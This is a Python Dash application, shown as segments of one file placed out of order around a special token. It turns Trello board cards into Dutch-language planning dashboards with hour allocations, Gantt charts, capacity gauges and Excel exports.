        if j['Lijst'] in config.get('Not Started'):
            j['Status'] = 'Niet gestart'
        elif j['Lijst'] in config.get('Doing'):
            j['Status'] = 'Doing'
        elif j['Lijst'] in config.get('Blocked'):
            j['Status'] = 'Blocked'
        elif j['Lijst'] in config.get('Done'):
            j['Status'] = 'Done'
        elif j['Lijst'] in config.get('Always continuing'):
            j['Status'] = 'Doorlopend'
        elif j['Lijst'] in config.get('Epics'):
            j['Status'] = 'Epics Doing'
        elif j['Lijst'] in config.get('List with Epics Done'):
            j['Status'] = 'Epics Done'
        else:
            j['Status'] = 'Archived'
        del j['customfields']
        del j['ListID']
    for i, j in kaarten.items():
        # Archived cards keep status 'Done' when they were finished.
        if j['Gearchiveerd'] == True and j['Status'] != 'Done':
            j['Status'] = 'Archived'
    liststodelete = []
    for i in lists:
        if i['name'] not in chosenlists:
            liststodelete.append(i['name'])
    cardstodelete = []
    for i, j in kaarten.items():
        if j['Sjabloon'] == True:
            cardstodelete.append(i)
        elif j['Lijst'] in liststodelete:
            cardstodelete.append(i)
    # Available hours per person come from cards on the configured hours list.
    hours = {}
    for i, j in kaarten.items():
        if j['Lijst'] == config.get('List for hours'):
            hours[j['Naam']] = {config['Custom Field for Starting date']: j
                [config['Custom Field for Starting date']], config[
                'Custom Field for Ending date']: j[config[
                'Custom Field for Ending date']], config[
                'Custom Field with hours']: j[config[
                'Custom Field with hours']]}
    for i in cardstodelete:
        if i in kaarten:
            del kaarten[i]
    # ---- Date axis: 183 days of history, 365 days ahead --------------------
    tmpdatesdict = {}
    now = datetime.now().date()
    numdays = 365
    numdayshistory = 183
    for x in range(0, numdays):
        tmpdatesdict[str(now + timedelta(days=x))] = {}
    for x in range(0, numdayshistory):
        tmpdatesdict[str(now - timedelta(days=x))] = {}
    dates = sorted(tmpdatesdict)
    arrays = {'epics': list(dict.fromkeys([card['Epic'] for card in kaarten
        .values()])), 'xaxis_months': list(dict.fromkeys([(i[0:4] + '-' + i
        [5:7] + '-01') for i in dates])), 'perioden': list(dict.fromkeys([(
        i[0:4] + i[5:7]) for i in dates])), 'statuses': list(dict.fromkeys(
        [card['Status'] for card in kaarten.values()])), config.get(
        'Custom Field for Categories'): list(dict.fromkeys([card[config.get
        ('Custom Field for Categories')] for card in kaarten.values()])),
        config.get('Custom Field for Person'): list(dict.fromkeys([(card[
        config.get('Custom Field for Person')] if card[config.get(
        'Custom Field for Person')] != None else 'Geen ' + config.get(
        'Custom Field for Person')) for card in kaarten.values()]))}
    # Per-card hour bookkeeping; the except-branch serves boards without the
    # optional 'Gebied'/'Cognosrapport'/'Niet meenemen in telling' fields.
    try:
        urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],
            'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],
            'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.
            get('Custom Field for Starting date'): kaart[config.get(
            'Custom Field for Starting date')], config.get(
            'Custom Field for Ending date'): kaart[config.get(
            'Custom Field for Ending date')], 'Gebied': kaart['Gebied'],
            config.get('Custom Field for Person'): kaart[config.get(
            'Custom Field for Person')], config.get(
            'Custom Field for Categories'): kaart[config.get(
            'Custom Field for Categories')], config.get(
            'Custom Field with hours'): kaart[config.get(
            'Custom Field with hours')], 'Cognosrapport': kaart[
            'Cognosrapport'], 'Niet meenemen in telling': kaart[
            'Niet meenemen in telling'], 'Lijst': kaart['Lijst'], 'Status':
            kaart['Status'], 'urenperdag': {i: 0 for i in dates},
            'urenperperiode': {i: 0 for i in arrays['perioden']}} for
            kaart in kaarten.values()}
    except Exception:
        urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],
            'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],
            'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.
            get('Custom Field for Starting date'): kaart[config.get(
            'Custom Field for Starting date')], config.get(
            'Custom Field for Ending date'): kaart[config.get(
            'Custom Field for Ending date')], config.get(
            'Custom Field for Person'): kaart[config.get(
            'Custom Field for Person')], config.get(
            'Custom Field for Categories'): kaart[config.get(
            'Custom Field for Categories')], config.get(
            'Custom Field with hours'): kaart[config.get(
            'Custom Field with hours')], 'Lijst': kaart['Lijst'], 'Status':
            kaart['Status'], 'urenperdag': {i: 0 for i in dates},
            'urenperperiode': {i: 0 for i in arrays['perioden']}} for
            kaart in kaarten.values()}
    beschikbareuren = {key: {'urenperdag': {i: 0 for i in dates},
        'urenperperiode': {i: 0 for i in arrays['perioden']}} for key in
        hours.keys()}
    # ---- Spread planned/available hours evenly over each card's range ------
    for i in dates:
        datekey = datetime.strptime(i, '%Y-%m-%d').date()
        for k, l in kaarten.items():
            # .get(): the field may not exist on this board (matches the
            # except-branch above, which omits it; plain indexing would raise).
            if l.get('Niet meenemen in telling') != True:
                try:
                    if l[config.get('Custom Field for Starting date')].date(
                            ) < datekey <= l[config.get(
                            'Custom Field for Ending date')].date():
                        delta = l[config.get('Custom Field for Ending date')
                            ] - l[config.get('Custom Field for Starting date')]
                        hoursperday = int(l[config.get(
                            'Custom Field with hours')]) / int(delta.days)
                        urenperdagperkaart[l['Naam']]['urenperdag'][i
                            ] = hoursperday
                except Exception:
                    # No dates / no estimate on this card: contributes nothing.
                    pass
        for k, l in hours.items():
            try:
                if l[config.get('Custom Field for Starting date')].date(
                        ) < datekey <= l[config.get(
                        'Custom Field for Ending date')].date():
                    # Monthly availability converted to hours per day.
                    hoursperday = int(l[config.get('Custom Field with hours')]
                        ) / int(30.4)
                    beschikbareuren[k]['urenperdag'][i] = hoursperday
            except Exception:
                pass
    # Aggregate per-day values into per-month totals. Every date's 'YYYYMM'
    # is guaranteed to be a key of 'urenperperiode' because both were derived
    # from the same ``dates`` list (direct add replaces the old O(days*months)
    # scan with identical results).
    for j in urenperdagperkaart.values():
        for k, l in j['urenperdag'].items():
            j['urenperperiode'][k[0:4] + k[5:7]] += l
    for j in beschikbareuren.values():
        for k, l in j['urenperdag'].items():
            j['urenperperiode'][k[0:4] + k[5:7]] += l
    # ---- Table variant: one column per month -------------------------------
    dfurenpermaand = copy.deepcopy(urenperdagperkaart)
    for i, j in dfurenpermaand.items():
        try:
            j['Geplande uren'] = int(j['Geplande uren'])
        except Exception:
            j['Geplande uren'] = 0
        for k, l in j['urenperperiode'].items():
            j[k] = round(l, 2)
        del j['urenperperiode']

    def _plannable_but_unplanned(card):
        # 'Niet gestart' cards with an hour estimate but no start/end date yet.
        return (card[config.get('Custom Field for Starting date')] == None
                and card[config.get('Custom Field for Ending date')] == None
                and card[config.get('Custom Field with hours')] != None
                and card['Status'] == 'Niet gestart')

    # Stacked bars: unplanned hours per list ...
    bars = []
    labelsnietingepland = []
    for j in kaarten.values():
        if _plannable_but_unplanned(j):
            labelsnietingepland.append(j['Lijst'])
    labelsnietingepland = list(dict.fromkeys(labelsnietingepland))
    for i, j in kaarten.items():
        if _plannable_but_unplanned(j):
            tmp = [int(j['Geplande uren']) if j['Lijst'] == label else 0
                   for label in labelsnietingepland]
            bars.append(dict(x=labelsnietingepland, y=tmp, name=j['Naam'],
                type='bar', opacity='0.6'))
    # ... and per epic.
    epicbars = []
    tmpepicsforbarchart = {epic: 0 for epic in [name['Naam'] for name in
        kaarten.values() if name['Status'] in ['Epics Doing', 'Epics Done']]}
    tmpepicsforbarchart['Geen epic'] = 0
    for i, j in kaarten.items():
        if _plannable_but_unplanned(j):
            tmpepicsforbarchart[j['Epic']] += int(j[config.get(
                'Custom Field with hours')])
    epicsforbarchart = {k: v for k, v in tmpepicsforbarchart.items() if v != 0}
    epicbars.append(dict(x=[key for key in epicsforbarchart.keys()], y=[
        value for value in epicsforbarchart.values()], type='bar', text=[
        value for value in epicsforbarchart.values()], textposition=
        'outside', opacity='0.6'))
    # ---- Gauges for the coming three months --------------------------------
    thismonth = datetime.strftime(datetime.now(), '%Y%m')
    nextmonth = (datetime.now() + relativedelta(months=1)).strftime('%Y%m')
    twomonths = (datetime.now() + relativedelta(months=2)).strftime('%Y%m')
    arrays['threemonths'] = [(thismonth, datetime.strptime(thismonth,
        '%Y%m').strftime('%B')), (nextmonth, datetime.strptime(nextmonth,
        '%Y%m').strftime('%B')), (twomonths, datetime.strptime(twomonths,
        '%Y%m').strftime('%B'))]

    def _total_for(month, percard):
        # Sum of that month's hours over all cards/persons.
        return round(sum(card['urenperperiode'].get(month, 0)
                         for card in percard.values()))

    def _gauge_steps(delta, upper):
        # Green -> red bands; the threshold line marks the available hours.
        return {'axis': {'range': [None, upper]}, 'bar': {'color': '#3eb6eb'},
                'steps': [{'range': [0, delta * 0.5], 'color': '#3deb34'},
                          {'range': [delta * 0.5, delta * 0.75], 'color': '#b4eb34'},
                          {'range': [delta * 0.75, delta * 0.9], 'color': '#ebb434'},
                          {'range': [delta * 0.9, delta], 'color': '#eb6e34'},
                          {'range': [delta, upper], 'color': '#eb3434'}],
                'threshold': {'line': {'color': '#5c0000', 'width': 4},
                              'thickness': 0.75, 'value': delta}}

    gaugefig = go.Figure()
    for domain, month in zip(({'x': [0, 0.3], 'y': [0, 1]},
                              {'x': [0.35, 0.65], 'y': [0, 1]},
                              {'x': [0.7, 1], 'y': [0, 1]}),
                             (thismonth, nextmonth, twomonths)):
        gepland = _total_for(month, urenperdagperkaart)
        delta = _total_for(month, beschikbareuren)
        # Axis range: 20 hours of headroom above the larger of the two values.
        gaugefig.add_trace(go.Indicator(domain=domain, value=gepland,
            mode='gauge+number+delta',
            title={'text': 'Totale uren voor ' + datetime.strptime(month,
                '%Y%m').strftime('%B')},
            delta={'reference': delta},
            gauge=_gauge_steps(delta, max(delta, gepland) + 20)))
    gaugefig.update_layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
        'rgba(0,0,0,0)')
    graphdata = {'nietingepland': bars, 'nietingeplandepics': epicbars,
        'gaugefig': gaugefig}
    # ---- Column typing for the DataTables ----------------------------------
    # (loop variable renamed from 'value': it shadowed the board-id parameter)
    columntypes = {}
    for key, val in kaarten[next(iter(kaarten))].items():
        if 'datum' in key or key == 'Aangemaakt':
            columntypes[key] = 'datetime'
        elif type(val) == int:
            columntypes[key] = 'numeric'
        else:
            # BUG FIX: this used to read ``elif type(value in [str, bool]):``,
            # which is always truthy (it is type() of a bool expression), so
            # every remaining column ended up typed 'text'. Keep that proven
            # behaviour, but state it explicitly.
            columntypes[key] = 'text'
    columntypesurenpermaand = dict(columntypes)
    columntypesurenpermaand.update({i: 'text' for i in arrays['perioden']})
    data = {'kaarten': kaarten, 'arrays': arrays, 'urenperdagperkaart':
        urenperdagperkaart, 'beschikbareuren': beschikbareuren, 'graphdata':
        graphdata, 'dfs': {'kaartendf': pd.DataFrame(data=kaarten).T,
        'columntypes': columntypes, 'urenpermaand': pd.DataFrame(data=
        dfurenpermaand).T, 'columntypesurenpermaand': columntypesurenpermaand}}
def make_layout():
    """Build the top-level page layout: banner, board selector, refresh button.

    The empty Div with id 'test' is the container that the `create_maindiv`
    callback fills once a board has been chosen.
    """
    banner_style = {
        'font-style': 'italic',
        'font-weight': 'bold',
        'border': '10px',
        'box-shadow': '8px 8px 8px grey',
        'background': 'rgb(149,193,31)',
        'background': 'linear-gradient(133deg, rgba(62,182,235,1) 0%, rgba(243,253,255,1) 76%, rgba(243,253,255,0) 100%)',
        'margin-top': '1%',
        'margin-bottom': '1%',
        'margin-right': '1%',
        'margin-left': '1%',
        'border-radius': '10px',
        'text-align': 'center',
    }
    title_block = html.Div(
        style={'display': 'inline-block', 'width': '80%'},
        children=[html.H1('Trello borden USD')],
    )
    logo_block = html.Div(
        style={'display': 'inline-block', 'margin-right': '1px'},
        children=[
            html.Img(
                src=app.get_asset_url('logonop.png'),
                style={'width': '150px', 'margin-right': '0px'},
            )
        ],
    )
    banner = html.Div(
        style=banner_style,
        className='Banner',
        children=[title_block, logo_block],
    )
    board_picker = dcc.Dropdown(
        id='dropdown_boards',
        options=[{'label': board['name'], 'value': board['id']} for board in boards],
        value=boards[0]['id'],
    )
    return html.Div(
        className='First Div',
        children=[
            banner,
            html.H5('Kies hieronder een bord', style={'text-align': 'center'}),
            board_picker,
            html.Button('Data verversen', id='refreshdatabtn', n_clicks=0),
            html.Div(id='test'),
        ],
    )
# External assets: a base CSS theme plus the Dutch locale bundle for Plotly.
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
external_scripts = ['https://cdn.plot.ly/plotly-locale-nl-latest.js']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets,
    external_scripts=external_scripts, url_base_pathname='/dash/')
# Assign the function itself (not its result) so the layout is re-evaluated
# on every page load.
app.layout = make_layout
# Most components only exist after the `create_maindiv` callback has rendered
# them, so callback validation against the initial layout must be disabled.
app.config['suppress_callback_exceptions'] = True
@app.callback(Output('test', 'children'), [Input('dropdown_boards', 'value'),
    Input('refreshdatabtn', 'n_clicks')])
def create_maindiv(value, n_clicks):
    """Refresh the Trello data for board `value` and build the main tab layout.

    Triggered by the board dropdown and the refresh button; returns the
    children of the 'test' container: a 'last refreshed' line plus four tabs
    (Gantt charts, data export, long-term planning, tactical planning).
    """
    # first retrieve all data (rebuilds the module-level `data` dict)
    get_data(value)
    import os
    # Windows strftime has no '%-d' (non-padded day), so fall back to '%d'.
    if os.name == 'nt':
        daterefreshed = datetime.strftime(datetime.now(), '%A %d %b, %H:%M')
    else:
        daterefreshed = datetime.strftime(datetime.now(), '%A %-d %B, %H:%M')
    return html.Div(className='', children=[
        dcc.Markdown('**Laatst ververst: **' + daterefreshed),
        dcc.Tabs(className='Tabs', children=[
            # --- Tab 1: Gantt charts per epic and per person ---------------
            dcc.Tab(label='Gantt charts', style=globals['styles']['tabs'], children=[
                html.Div(className='tab2_div1', style=globals['styles']['maindivs'], children=[
                    html.H3('Uitleg'),
                    html.Div(style=globals['styles']['divgraphs'], children=[
                        dcc.Markdown('In dit tabblad worden de kaarten in GANTT charts weergegeven. Kies in de dropdown voor welke epic de kaarten moeten worden weergegeven.')])]),
                html.Div(className='tab2_div2', style=globals['styles']['maindivs'], children=[
                    html.H4('Gantt per epic'),
                    dcc.Dropdown(style=globals['styles']['dropdowns'], id='dropdownganttepics',
                        options=[{'label': name, 'value': name} for name in data['arrays']['epics']],
                        value=[next(iter(data['arrays']['epics']))]),
                    html.Div(style=globals['styles']['divgraphs'], children=[dcc.Graph(id='ganttepics')])]),
                html.Div(className='tab2_div3', style=globals['styles']['maindivs'], children=[
                    html.H4('Gantt per persoon'),
                    dcc.Dropdown(style=globals['styles']['dropdowns'], id='dropdownganttpersoon',
                        options=[{'label': name, 'value': name} for name in data['arrays'][config.get('Custom Field for Person')]]),
                    dcc.Dropdown(style=globals['styles']['dropdowns'], id='dropdownganttpersoonstatus',
                        options=[{'label': name, 'value': name} for name in data['arrays']['statuses']],
                        value=data['arrays']['statuses'], multi=True),
                    html.Div(style=globals['styles']['divgraphs'], children=[dcc.Graph(id='ganttpersoon')])])]),
            # --- Tab 2: filterable raw-data exports (Excel) ----------------
            dcc.Tab(label='Data export', style=globals['styles']['tabs'], children=[
                html.Div(className='tab3_div1', style=globals['styles']['maindivs'], children=[
                    html.H3('Uitleg'),
                    html.Div(style=globals['styles']['divgraphs'], children=[
                        dcc.Markdown("Hieronder kan de data worden geëxporteerd. Via de buttons 'Export' downloadt je een excelbestand."),
                        dcc.Markdown("In het dashboard kun je met de knop 'Toggle columns' ook velden zichtbaar maken, om van tevoren te filteren. Kies dan de velden, filter daarna en klik op 'Export'.")])]),
                html.Div(className='tab3_div2', style=globals['styles']['maindivs'], children=[
                    html.H4('Platte dump'),
                    dcc.Markdown('Deze tabel laat de platte data zien, zoals in Trello gevuld.'),
                    dash_table.DataTable(id='table_plattedump',
                        columns=[{'name': i, 'id': i, 'type': data['dfs']['columntypes'].get(i), 'hideable': True}
                            for i in data['dfs']['kaartendf'].columns if i in data['dfs']['columntypes'].keys()],
                        data=data['dfs']['kaartendf'].to_dict('records'),
                        # All typed columns start hidden; 'Toggle columns' reveals them.
                        hidden_columns=[i for i in data['dfs']['columntypes']],
                        export_format='xlsx', export_headers='display', export_columns='all',
                        filter_action='native', sort_action='native', sort_mode='multi',
                        style_table={'overflowX': 'scroll'},
                        style_header={'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black', 'fontWeight': 'bold', 'fontFamily': 'Arial'},
                        style_cell={'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black', 'text-align': 'left', 'fontFamily': 'Arial', 'height': 'auto'})]),
                html.Div(className='tab3_div3', style=globals['styles']['maindivs'], children=[
                    html.H4('Uren per maand'),
                    dcc.Markdown('Hieronder kan een export gemaakt worden van de uren zoals ze per maand zijn ingepland.'),
                    dcc.Markdown('Ook hierin kan gefilterd worden. filter bijvoorbeeld in de maand naar keuze op >0 om alle kaarten die geen ingeplande uren hebben niet te tonen.'),
                    dash_table.DataTable(id='table_urenpermaand',
                        columns=[{'name': i, 'id': i, 'type': data['dfs']['columntypesurenpermaand'].get(i), 'hideable': True}
                            for i in data['dfs']['urenpermaand'].columns if i in data['dfs']['columntypesurenpermaand'].keys()],
                        data=data['dfs']['urenpermaand'].to_dict('records'),
                        hidden_columns=[i for i in data['dfs']['columntypesurenpermaand']],
                        export_format='xlsx', export_headers='display', export_columns='all',
                        filter_action='native', sort_action='native', sort_mode='multi',
                        style_header={'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black', 'fontWeight': 'bold', 'fontFamily': 'Arial'},
                        style_cell={'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black', 'text-align': 'left', 'fontFamily': 'Arial'})])]),
            # --- Tab 3: long-term planning per category --------------------
            dcc.Tab(label='Langetermijnplanning', style=globals['styles']['tabs'], children=[
                html.Div(className='maindivs', style=globals['styles']['maindivs'], children=[
                    html.H3('Uitleg'),
                    html.Div(style=globals['styles']['divgraphs'], children=[
                        dcc.Markdown('In dit tabblad wordt een langetermijnplanning getoond.'),
                        dcc.Markdown('De focus hierbij ligt vooral op de categorieen.')])]),
                html.Div(className='maindivs', style=globals['styles']['maindivs'], children=[
                    html.H4('Ingeplande uren per categorie'),
                    dcc.Dropdown(style=globals['styles']['dropdowns'], id='dropdownurenpermaand',
                        options=[{'label': name, 'value': name} for name in data['arrays'][config.get('Custom Field for Categories')] if name != None],
                        multi=True, searchable=False,
                        value=data['arrays'][config.get('Custom Field for Categories')]),
                    html.Div(style=globals['styles']['divgraphs'], children=[dcc.Graph(id='urenpermaand')])]),
                html.Div(className='tab1_div3', style=globals['styles']['maindivs'], children=[
                    html.H4('Nog in te plannen uren (per lijst)'),
                    dcc.Markdown('*Nieuw* zijn werkzaamheden die **nog niet** zijn besproken of ze worden gedaan.'),
                    dcc.Markdown('*Wensenlijst* zijn werkzaamheden die **wel** zijn besproken, maar **geen prioriteit** hebben.'),
                    dcc.Markdown('*Inplannen* zijn werkzaamheden die **moeten** gebeuren.'),
                    dcc.Markdown('**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'),
                    html.Div(style=globals['styles']['divgraphs'], children=[
                        dcc.Graph(id='graph_nietingepland', figure={'data': data['graphdata']['nietingepland'], 'layout': globals['graphlayouts']['bars']})])]),
                html.Div(className='tab1_div4', style=globals['styles']['maindivs'], children=[
                    html.H4('Nog in te plannen uren (per epic)'),
                    dcc.Markdown('**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'),
                    html.Div(style=globals['styles']['divgraphs'], children=[
                        dcc.Graph(id='graph_nietingepland_epics', figure={'data': data['graphdata']['nietingeplandepics'], 'layout': globals['graphlayouts']['bars']})])])]),
            # --- Tab 4: tactical (three-month) planning --------------------
            dcc.Tab(style=globals['styles']['tabs'], label='Tactische planning', children=[
                html.Div(className='maindivs', style=globals['styles']['maindivs'], children=[
                    html.H3('Uitleg'),
                    dcc.Markdown('In dit tabblad is een middellange termijnplanning te zien.')]),
                html.Div(className='maindivs', style=globals['styles']['maindivs'], children=[
                    html.H4('Totalen'),
                    dcc.Markdown('Hieronder staan twee totaaloverzichten van de aankomende maanden.'),
                    dcc.Markdown('De blauwe balk geeft de ingeplande uren weer. De streep geeft de beschikbare uren aan.'),
                    dcc.Markdown('Het kleine getal eronder geeft aan hoeveel uren tekort/over zijn voor die maand.'),
                    html.Div(style=globals['styles']['divgraphs'], children=[
                        dcc.Graph(figure=data['graphdata']['gaugefig'])])]),
                html.Div(className='maindivs', style=globals['styles']['maindivs'], children=[
                    html.H4('Gantt'),
                    dcc.Dropdown(style=globals['styles']['dropdowns'], id='dropdowngantttactisch',
                        options=[{'label': j, 'value': i} for i, j in data['arrays']['threemonths']],
                        multi=False, searchable=False,
                        value=data['arrays']['threemonths'][0][0]),
                    html.Div(style=globals['styles']['divgraphs'], children=[dcc.Graph(id='gantttactisch')])])])])])
def _shift_yyyymm(yyyymm, months):
    """Shift a 'YYYYMM' period string by `months`, rolling over year boundaries.

    Replaces the naive string arithmetic of the original code, which produced
    invalid periods such as '202314' for December + 2 months.
    """
    year, month0 = divmod(int(yyyymm), 100)
    year, month0 = divmod(year * 12 + (month0 - 1) + months, 12)
    return '%04d%02d' % (year, month0 + 1)


@app.callback(Output('gantttactisch', 'figure'), [Input(
    'dropdowngantttactisch', 'value')])
def update_gantttactisch(v1):
    """Render the tactical Gantt chart for the 'YYYYMM' month selected in `v1`.

    Shows every card with status 'Niet gestart', 'Doing' or 'Blocked' that
    overlaps the selected month. Bars are clamped to the window
    [month - 1, month + 2) and two vertical lines mark the boundaries of the
    selected month itself. Returns an empty transparent figure when nothing
    is selected.
    """
    if v1 is None:
        return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=
            'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
    import numpy as np
    from operator import itemgetter
    # BUGFIX: the original computed month+1/month+2 with str(int(v1) + n),
    # which breaks across year boundaries (December + 2 became month '14',
    # making strptime raise inside the try below and silently emptying the
    # chart). _shift_yyyymm handles the roll-over correctly.
    v1min1 = _shift_yyyymm(v1, -1)
    v1plus1 = _shift_yyyymm(v1, 1)
    v1plus2 = _shift_yyyymm(v1, 2)
    monthkey = int(v1)
    ganttdata = []
    for i, j in data['kaarten'].items():
        if j['Status'] in ['Niet gestart', 'Doing', 'Blocked']:
            try:
                if int(datetime.strftime(j['Begindatum'], '%Y%m')
                    ) <= monthkey and int(datetime.strftime(j['Einddatum'],
                    '%Y%m')) >= monthkey:
                    # Clamp the bar to the displayed three-month window.
                    if j['Begindatum'].date() < datetime.strptime(v1min1 +
                        '01', '%Y%m%d').date():
                        start = datetime.strptime(v1min1 + '01', '%Y%m%d').date()
                    else:
                        start = j['Begindatum'].date()
                    if j['Einddatum'].date() >= datetime.strptime(v1plus2 +
                        '01', '%Y%m%d').date():
                        eind = datetime.strptime(v1plus2 + '01', '%Y%m%d').date()
                    else:
                        eind = j['Einddatum'].date()
                    ganttdata.append(dict(Task=j['Epic'], Start=start,
                        Finish=eind, Resource=j['Naam'] + ' (uren: ' + str(
                        round(data['urenperdagperkaart'][j['Naam']][
                        'urenperperiode'][v1])) + ')'))
            except Exception:
                # Cards without both dates (or absent from the hours table)
                # cannot be drawn and are skipped.
                pass
    result = sorted(ganttdata, key=itemgetter('Task'))
    # One random colour per row; create_gantt maps them onto the resources.
    rgb = ['rgb(' + ','.join(map(str, np.random.choice(range(256), size=3))) +
        ')' for _ in range(len(result))]
    fig = ff.create_gantt(result, index_col='Resource', show_colorbar=True,
        group_tasks=False, showgrid_x=True, showgrid_y=True, colors=rgb)
    fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
        'rgba(0,0,0,0)')
    # Vertical black lines marking the start and end of the selected month.
    for period in (v1, v1plus1):
        marker = period[0:4] + '-' + period[4:] + '-01'
        fig.add_trace(go.Scatter(mode='lines', x=[marker, marker], y=[-1,
            len(result)], line={'shape': 'spline', 'color': 'black',
            'width': 4}, showlegend=False))
    return fig
@app.callback(Output('ganttpersoon', 'figure'), [Input(
    'dropdownganttpersoon', 'value'), Input('dropdownganttpersoonstatus',
    'value')])
def update_ganttpersoon(v1, v2):
    """Gantt chart of all non-archived cards assigned to person `v1`,
    limited to the statuses selected in `v2`; bars are coloured per epic.
    Returns an empty transparent figure when no card qualifies.
    """
    startfield = config.get('Custom Field for Starting date')
    endfield = config.get('Custom Field for Ending date')
    personfield = config.get('Custom Field for Person')
    tasks = []
    for kaart in data['kaarten'].values():
        if kaart[personfield] != v1 or kaart['Status'] == 'Archived':
            continue
        if kaart['Status'] not in v2:
            continue
        try:
            tasks.append(dict(Task=kaart['Naam'],
                              Start=kaart[startfield].date(),
                              Finish=kaart[endfield].date(),
                              Resource=kaart['Epic']))
        except:
            # Cards missing a start or end date cannot be drawn.
            pass
    if not tasks:
        return {'data': [go.Pie()],
                'layout': go.Layout(paper_bgcolor='rgba(0,0,0,0)',
                                    plot_bgcolor='rgba(0,0,0,0)')}
    fig = ff.create_gantt(tasks, index_col='Resource', show_colorbar=True,
                          showgrid_x=True, showgrid_y=True)
    fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)',
                         plot_bgcolor='rgba(0,0,0,0)')
    return fig
@app.callback(Output('ganttepics', 'figure'), [Input('dropdownganttepics',
    'value')])
def update_ganttepics(value):
    """Gantt chart of every non-archived card that belongs to epic `value`,
    with bars coloured by card status. Returns an empty transparent figure
    when no card qualifies.
    """
    startfield = config.get('Custom Field for Starting date')
    endfield = config.get('Custom Field for Ending date')
    rows = []
    for kaart in data['kaarten'].values():
        if kaart['Epic'] != value or kaart['Status'] == 'Archived':
            continue
        try:
            rows.append(dict(Task=kaart['Naam'],
                             Start=kaart[startfield].date(),
                             Finish=kaart[endfield].date(),
                             Resource=kaart['Status']))
        except:
            # Cards missing a start or end date cannot be drawn.
            pass
    if not rows:
        return {'data': [go.Pie()],
                'layout': go.Layout(paper_bgcolor='rgba(0,0,0,0)',
                                    plot_bgcolor='rgba(0,0,0,0)')}
    fig = ff.create_gantt(rows, index_col='Resource', show_colorbar=True,
                          showgrid_x=True, showgrid_y=True)
    fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)',
                         plot_bgcolor='rgba(0,0,0,0)')
    return fig
@app.callback(Output('urenpermaand', 'figure'), [Input(
    'dropdownurenpermaand', 'value')])
def update_urenpermaand(value):
    """Stacked spline chart of planned hours per month for the categories
    selected in `value`, with the total available hours drawn on top as a
    thick black line. 'Regulier werk' is always stacked first when selected.
    """
    catfield = config.get('Custom Field for Categories')
    periods = data['arrays']['perioden']
    months = data['arrays']['xaxis_months']

    def planned_hours(categorie):
        # Hours planned per period, summed over all cards in `categorie`.
        return [round(sum(kaart['urenperperiode'][periode] for kaart in
            data['urenperdagperkaart'].values() if kaart[catfield] ==
            categorie), 0) for periode in periods]

    traces = []
    if 'Regulier werk' in value:
        traces.append(dict(x=months, y=planned_hours('Regulier werk'),
            name='Regulier werk', line={'shape': 'spline', 'smoothing': 0.4},
            mode='lines+markers', marker={'symbol': 'triangle-up-open',
            'size': 10}, stackgroup='one'))
    for categorie in data['arrays'][catfield]:
        if categorie in value and categorie != 'Regulier werk':
            traces.append(dict(x=months, y=planned_hours(categorie),
                name='Geen categorie' if categorie is None else categorie,
                line={'shape': 'spline', 'smoothing': 0.4},
                mode='lines+markers', marker={'symbol': 'triangle-up-open',
                'size': 10}, stackgroup='one'))
    # Reference line: total available hours per period over all persons.
    beschikbaar = [round(sum(persoon['urenperperiode'][periode] for persoon in
        data['beschikbareuren'].values()), 0) for periode in periods]
    traces.append(dict(name='Totaal beschikbare uren', mode='lines',
        x=months, y=beschikbaar, size=10, line={'shape': 'spline',
        'smoothing': 0.3, 'width': 6, 'color': 'black'}))
    return {'data': traces, 'layout': go.Layout(
        paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)',
        xaxis={'title': 'Datum', 'gridcolor': 'gray'},
        yaxis={'title': 'Ingeplande uren', 'gridcolor': 'gray'})}
# Plain Flask route on Dash's underlying server: serves the configuration
# file as a download.
@app.server.route('/dash/configuration/')
def download_file():
    """Send ./configuration/configuration.txt to the browser as an attachment.

    cache_timeout=0 forces re-download of the current file on every request.
    NOTE(review): Flask 2.0 renamed `attachment_filename` to `download_name`
    and `cache_timeout` to `max_age` — confirm the deployed Flask version
    still accepts these keywords.
    """
    return flask.send_file('./configuration/configuration.txt',
        attachment_filename='configuration.txt', as_attachment=True,
        cache_timeout=0)
# Run the built-in development server when executed directly
# (a WSGI server would import `app.server` instead).
if __name__ == '__main__':
    app.run_server(debug=False, host='0.0.0.0', port=8050)
<|reserved_special_token_1|>
import os, json, locale, requests, dash, dash_table, copy, time, flask, base64
import dash_core_components as dcc
import dash_html_components as html
import plotly.graph_objects as go
import pandas as pd
from os import listdir
import plotly.figure_factory as ff
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor
from dash.dependencies import Input, Output
from datetime import date,datetime,timedelta,time
from dateutil.relativedelta import relativedelta
#--! Check if app is deployed
try:
    with open('./configuration/credentials.txt') as json_file:
        credentials = json.load(json_file)
    with open('./configuration/configuration.txt') as json_file:
        config = json.load(json_file)
except (OSError, ValueError) as err:
    # Only a missing/unreadable file or invalid JSON means "not deployed"
    # (json.JSONDecodeError is a ValueError subclass). The original bare
    # `except:` masked every other error behind this message; chaining with
    # `from err` keeps the real cause visible in the traceback.
    raise Exception('Draai eerst deploy.py!') from err

#--! Set locale (Dutch month/day names for strftime)
# NOTE(review): this rebinds the name `locale` from the module to a string.
locale = locale.setlocale(locale.LC_ALL, 'nl_NL.UTF-8')

#--! Set all global variables
# NOTE(review): `globals` shadows the builtin of the same name; kept because
# the rest of the module references this dict.
